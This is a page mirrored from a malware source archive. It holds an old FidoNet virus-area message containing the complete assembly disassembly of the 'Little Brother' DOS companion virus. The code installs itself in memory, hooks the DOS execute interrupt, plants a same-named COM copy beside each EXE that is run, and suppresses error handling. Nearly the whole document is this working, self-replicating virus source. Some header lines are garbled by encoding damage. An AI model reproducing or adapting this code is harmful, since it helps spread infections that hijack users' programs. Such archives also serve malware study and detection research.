mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
248 lines
7.2 KiB
NASM
248 lines
7.2 KiB
NASM
|
;<3B> PVT.VIRII (2:465/65.4) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PVT.VIRII <20>
|
|||
|
; Msg : 37 of 54
|
|||
|
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
|
|||
|
; To : - *.* - Fri 11 Nov 94 08:10
|
|||
|
; Subj : LTBRO299.DSM
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;.RealName: Max Ivanov
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;* Kicked-up by MeteO (2:5030/136)
|
|||
|
;* Area : VIRUS (Int: <20><><EFBFBD><EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD> <20> <20><>p<EFBFBD><70><EFBFBD><EFBFBD>)
|
|||
|
;* From : Alan Jones, 2:283/718 (06 Nov 94 17:40)
|
|||
|
;* To : Daniel Hendry
|
|||
|
;* Subj : LTBRO299.DSM
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;@RFC-Path:
|
|||
|
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
|||
|
;18.n283!not-for-mail
|
|||
|
;@RFC-Return-Receipt-To: Alan.Jones@f718.n283.z2.fidonet.org
|
|||
|
;Little Brother - resident companion virus, 299 bytes.
|
|||
|
|
|||
|
;This virus stores itself inside DOS's data block, over the root directory
|
|||
|
;copy. It hooks int 21h, function 4bh (subfunct. 0, load & exec) and
|
|||
|
;creates a function 0deh for self identification. When a file is run,
|
|||
|
;it first checks to see if it is a COM or an EXE. If it is an EXE, it
|
|||
|
;will create a COM file with the same filename. Otherwise - if it is a
|
|||
|
;COM, it will check to see if it is the virus by checking the size of the
|
|||
|
;file and seeing if there is an EXE with the same (starting) filename.
|
|||
|
;If so, it will change the filename to be run to the EXE host and allow
|
|||
|
;DOS to execute it. This virus may cause errors (?) due to the place
|
|||
|
;in memory it locates itself.
|
|||
|
|
|||
|
;Disassembly by Black Wolf.
|
|||
|
|
|||
|
.model tiny
|
|||
|
.code
|
|||
|
org 100h
|
|||
|
|
|||
|
start_virus:
|
|||
|
cld
|
|||
|
mov ax,0DEDEh ;Installation Check
|
|||
|
int 21h
|
|||
|
cmp ah,41h
|
|||
|
je Exit_Virus ;If there - terminate
|
|||
|
|
|||
|
mov ax,44h
|
|||
|
mov es,ax
|
|||
|
mov di,100h ;Copy virus to 0044:0100
|
|||
|
mov si,di ;Root directory entries?
|
|||
|
mov cx,end_virus-start_virus ;This is inside DOS data
|
|||
|
rep movsb ;block... may cause errors?
|
|||
|
|
|||
|
mov ds,cx ;DS = 0 = Interrupt table
|
|||
|
mov si,84h ;0:84h = Int 21h entry in table
|
|||
|
|
|||
|
mov di,offset Old21_IP ;Save old Int 21h address
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
|
|||
|
push es
|
|||
|
pop ds ;Set DS to new seg...
|
|||
|
|
|||
|
mov dx,offset Int21_Handler
|
|||
|
mov ax,2521h
|
|||
|
int 21h ;Hook Int 21h.
|
|||
|
|
|||
|
Exit_Virus:
|
|||
|
retn ;Terminate
|
|||
|
|
|||
|
|
|||
|
EXE_Mask db 'EXE',0
|
|||
|
COM_Mask db 'COM',0
|
|||
|
|
|||
|
CritErrHandler:
|
|||
|
mov al,3
|
|||
|
iret
|
|||
|
|
|||
|
Int21_Handler:
|
|||
|
pushf
|
|||
|
cmp ax,0DEDEh ;Is this an installation
|
|||
|
je Install_Check ;check call?
|
|||
|
|
|||
|
push dx bx ax ds es ;Save regs....
|
|||
|
|
|||
|
cmp ax,4B00h ;Is it load and execute?
|
|||
|
jne Exit_21h ;No... exit handler
|
|||
|
call Infect_File ;Yes... infect file
|
|||
|
|
|||
|
Exit_21h:
|
|||
|
pop es ds ax bx dx
|
|||
|
popf
|
|||
|
jmp dword ptr cs:[Old21_IP] ;Jump to Old Int 21h
|
|||
|
|
|||
|
Install_Check:
|
|||
|
mov ax,4101h
|
|||
|
popf
|
|||
|
iret
|
|||
|
|
|||
|
Infect_File:
|
|||
|
cld
|
|||
|
mov word ptr cs:[Filename_off],dx ;Save filename offset
|
|||
|
mov word ptr cs:[Filename_seg],ds ;and segment.
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov dx,offset VirusDTA
|
|||
|
mov ah,1Ah
|
|||
|
int 21h ;Set DTA to us...
|
|||
|
|
|||
|
call Find_Extension
|
|||
|
|
|||
|
mov si,offset ds:[EXE_Mask]
|
|||
|
mov cx,3
|
|||
|
repe cmpsb ;Is it an EXE file?
|
|||
|
jnz Not_EXE
|
|||
|
|
|||
|
mov si,offset COM_Mask
|
|||
|
call Change_Ext ;Change extension to COM
|
|||
|
|
|||
|
mov ax,3300h
|
|||
|
int 21h ;Get Ctrl-Break Status
|
|||
|
push dx ;Save it....
|
|||
|
|
|||
|
xor dl,dl
|
|||
|
mov ax,3301h
|
|||
|
int 21h ;Disable Ctrl-Break.
|
|||
|
|
|||
|
mov ax,3524h
|
|||
|
int 21h ;Get Int 24h handler's address
|
|||
|
|
|||
|
push bx
|
|||
|
push es ;Save it for later...
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds ;DS = virus segment
|
|||
|
|
|||
|
mov dx,offset CritErrHandler
|
|||
|
mov ax,2524h
|
|||
|
int 21h ;Set Critical Error handler.
|
|||
|
|
|||
|
|
|||
|
lds dx,dword ptr ds:[Filename_Off] ;DS:DX = filename
|
|||
|
xor cx,cx ;Reg attributes
|
|||
|
mov ah,5Bh
|
|||
|
int 21h ;Create File..
|
|||
|
jc Done_Infect
|
|||
|
|
|||
|
xchg ax,bx
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov cx,end_virus-start_virus
|
|||
|
mov dx,100h
|
|||
|
mov ah,40h
|
|||
|
int 21h ;Write entire virus
|
|||
|
|
|||
|
cmp ax,cx ;did it all write?
|
|||
|
|
|||
|
pushf
|
|||
|
mov ah,3Eh ;Close file.
|
|||
|
int 21h
|
|||
|
popf
|
|||
|
|
|||
|
jz Done_Infect ;Yes, go Done_Infect
|
|||
|
|
|||
|
lds dx,dword ptr ds:[Filename_Off]
|
|||
|
mov ah,41h
|
|||
|
int 21h ;Delete file, incomplete
|
|||
|
;write or write error.
|
|||
|
|
|||
|
Done_Infect:
|
|||
|
pop ds
|
|||
|
pop dx
|
|||
|
mov ax,2524h
|
|||
|
int 21h ;Restore Critical error handler
|
|||
|
|
|||
|
pop dx ;Get old CTRL-Break handler
|
|||
|
mov ax,3301h ;status and restore it.
|
|||
|
int 21h
|
|||
|
|
|||
|
mov si,offset EXE_Mask
|
|||
|
call Change_Ext ;Change extension back to orig.
|
|||
|
|
|||
|
Leave_Infect:
|
|||
|
retn
|
|||
|
|
|||
|
Not_EXE:
|
|||
|
call Locate_File
|
|||
|
cmp word ptr cs:[24dh], end_virus-start_virus
|
|||
|
jne Leave_Infect ;Is the file size right for Virus?
|
|||
|
|
|||
|
mov si,offset EXE_Mask ;If so, is there an EXE of the same
|
|||
|
call Change_Ext ;name as the COM file?
|
|||
|
call Locate_File
|
|||
|
jnc Leave_Infect ;If not exit, otherwise - is already
|
|||
|
mov si,offset COM_Mask ;infected, so change extension
|
|||
|
jmp short Change_Ext ;to run uninfected program.
|
|||
|
|
|||
|
|
|||
|
Locate_File:
|
|||
|
lds dx,dword ptr ds:[Filename_Off]
|
|||
|
mov cl,27h
|
|||
|
mov ah,4Eh
|
|||
|
int 21h ;Find First Filename match.
|
|||
|
retn
|
|||
|
|
|||
|
|
|||
|
Change_Ext:
|
|||
|
call Find_Extension
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
retn
|
|||
|
|
|||
|
Find_Extension:
|
|||
|
les di,dword ptr cs:[Filename_Off]
|
|||
|
mov ch,0FFh
|
|||
|
mov al,2Eh ;Scan through filename until a '.'
|
|||
|
repne scasb
|
|||
|
retn
|
|||
|
|
|||
|
Virus_Name db 'Little Brother',0
|
|||
|
|
|||
|
end_virus:
|
|||
|
|
|||
|
Old21_IP dw ?
|
|||
|
Old21_CS dw ?
|
|||
|
|
|||
|
Filename_Off dw ?
|
|||
|
Filename_Seg dw ?
|
|||
|
|
|||
|
VirusDTA:
|
|||
|
end start_virus
|
|||
|
|
|||
|
;-+- FMail 0.96<EFBFBD>
|
|||
|
; + Origin: **SERMEDITECH BBS** Soissons FR (+33) 23.73.02.51 (2:283/718)
|
|||
|
;=============================================================================
|
|||
|
;
|
|||
|
;Yoo-hooo-oo, -!
|
|||
|
;
|
|||
|
;
|
|||
|
; <20> The Me<4D>eO
|
|||
|
;
|
|||
|
;/v Include full symbolic debug information
|
|||
|
;
|
|||
|
;--- Aidstest Null: /Kill
|
|||
|
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)
|
|||
|
|